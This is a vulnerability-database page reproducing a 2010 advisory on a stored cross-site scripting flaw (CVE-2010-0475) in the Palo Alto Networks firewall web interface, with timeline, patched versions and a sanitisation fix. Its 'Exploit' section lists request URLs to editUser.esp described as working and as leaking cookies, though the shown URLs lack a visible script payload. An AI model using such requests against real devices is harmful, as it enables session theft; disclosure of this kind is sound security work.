Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Palo Alto Network Vulnerability - Cross-Site Scripting

🗓️ 19 May 2010 00:00:00Reported by Jeromie JacksonType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 50 Views

Palo Alto Network XSS Vulnerability, CVE-2010-0475, Remote and Local, Patche

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2010-0475
19 May 201000:00
circl
CVE		CVE-2010-0475
14 May 201019:24
cve
Cvelist		CVE-2010-0475
14 May 201019:24
cvelist
EUVD		EUVD-2010-0506
7 Oct 202500:30
euvd
exploitpack		Palo Alto Network Vulnerability - Cross-Site Scripting
19 May 201000:00
exploitpack
NVD		CVE-2010-0475
14 May 201019:30
nvd
Packet Storm		Palo Alto Network Cross Site Scripting
14 May 201000:00
packetstorm
Prion		Cross site scripting
14 May 201019:30
prion
securityvulns		Palo Alto Network Vulnerability - Cross-Site Scripting (XSS)
13 May 201000:00
securityvulns
seebug.org		Palo Alto Networks防火墙esp/editUser.esp页面存储式跨站脚本漏洞
18 May 201000:00
seebug
Rows per page
Palo Alto Network Vulnerability - Cross-Site Scripting (XSS)
------------------------------

Class: Cross-Site Scripting (XSS) Vulnerability
*CVE: CVE-2010-0475 *
*Remote: Yes
Local: Yes
Published: May 11, 2010 08:30AM *
Timeline:Submission to MITRE: 1/18/2010
Vendor Contact: 2/18/2010
Vendor Response: 2/18/2010
Patch Available: 5/2010 Patched in maintenance releases (3.1.1 & 3.0.9)
*Credit: Jeromie Jackson CISSP, CISM*
        COBIT & ITIL Certified
        President- San Diego Open Web Application Security Project (OWASP)
        Vice President- San Diego Information Audit & Control Association
(ISACA)
        SANS Mentor
        LinkedIn: www.linkedin.com/in/securityassessment
        Blog: www.JeromieJackson.com
        Twitter: www.twitter.com/Security_Sifu

Validated Vulnerable:
   Latest Version Per December 31, 2009

Discussion:

A Stored Cross-Site Scripting (XSS) vulnerability was found within the Palo
Alto interface. By crafting a URL that includes XSS code it is possible to
inject malicious data, redirect the user to a bogus replica of the real
website, or other nefarious activity.

Exploit:
Single Line working-
https://10.32.5.223:443/esp/editUser.esp?mode=edit&origusername=test&deviceC=localhost.localdomain&vsysC=localhost.localdomain%2Fvsys1&vsys=&profile=&cfgchange=&opasswd=&tpasswd=********&cpasswd=********&role=vsysadmin


&admin-role=%5Bobject+Object%5D&bSubmit=O

WORKING FOR REDIRECT TO LOAD cookies into URL.

https://10.32.5.223:443/esp/editUser.esp?mode=edit&origusername=test&deviceC=localhost.localdomain&vsysC=localhost.localdomain%2Fvsys1&vsys=&profile=&cfgchange=&opasswd=&tpasswd=********&cpasswd=********&role=vsysadmin&admin-role=%5Bobject+Object%5D&bSubmit=O

Solution:
A patch will be required from the vendor. It is recommended a routine to
sanitize user input be consistently implemented throughout the application
to mitigate other such occurrences within the application.

References:
OWASP Cross-Site Scripting (XSS) Attack Discussion
Rsnake's Cross-Site Scripting (XSS) Attack Cheat sheet

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
19 May 2010 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 24.3
EPSS0.00198
xss vulnerabilitycve-2010-0475remotelocalpatchedjeromie jacksonsan diego owasp
50